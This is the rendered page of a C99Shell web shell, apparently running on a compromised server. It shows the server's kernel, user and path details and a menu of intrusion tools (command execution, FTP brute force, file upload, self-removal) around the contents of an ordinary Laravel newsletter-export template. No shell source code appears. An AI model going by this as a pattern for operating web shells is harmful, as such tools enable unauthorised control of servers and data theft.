!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/Modules/Newsletter/Resources/views/   drwxr-xr-x
Free 29.29 GB of 117.98 GB (24.83%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     export-component.blade.php (2.26 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<form action="{{ route('module.newsletter.export') }}" method="POST">
    @csrf
    <div>
        <div class="p-2">
            <label for="order_by">
                {{ __('order_by') }}
            </label>
            <select name="from" id="order_by" class="mr-1 form-control">
                <option selected value="latest">
                    {{ __('from_latest') }}
                </option>
                <option value="oldest">
                    {{ __('from_oldest') }}
                </option>
            </select>
        </div>
    </div>
    <div>
        <div class="p-2">
            <label for="numberall">
                {{ __('amount') }}
            </label>
            <div class="input-group">
                <input value="5" id="numberall" name="amount" placeholder="{{ __('amount') }}" type="number"
                    class="form-control">
                <div class="input-group-append">
                    <button type="button" onclick="All()" class="btn btn-block btn-outline-info" type="button">
                        {{ __('all') }}
                    </button>
                </div>
            </div>
        </div>
    </div>
    <div>
        <div class="p-2">
            <label>
                {{ __('document_type') }}
            </label>
            <select name="type" style="" class="mr-1 form-control">
                <option selected value="csv">
                    {{ __('csv') }}
                </option>
                <option value="excel">
                    {{ __('excel') }}
                </option>
                <option value="pdf">
                    {{ __('pdf') }}
                </option>
            </select>
        </div>
    </div>
    <div class="m-2">
        <button type="submit" class="btn btn-block btn-outline-info btn-md">
            {{ __('download') }}
        </button>
    </div>
</form>

@section('script')
    <script>
        function All() {
            var phpData = "{!! $total !!}";
            $('#numberall').val(phpData);
        }

        $('#numberall').on('input', function() {
            var phpData = "{!! $total !!}";
            var value = $('#numberall').val();
            if (value > phpData) {
                $('#numberall').val(phpData);
            }
        });
    </script>
@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0052 ]--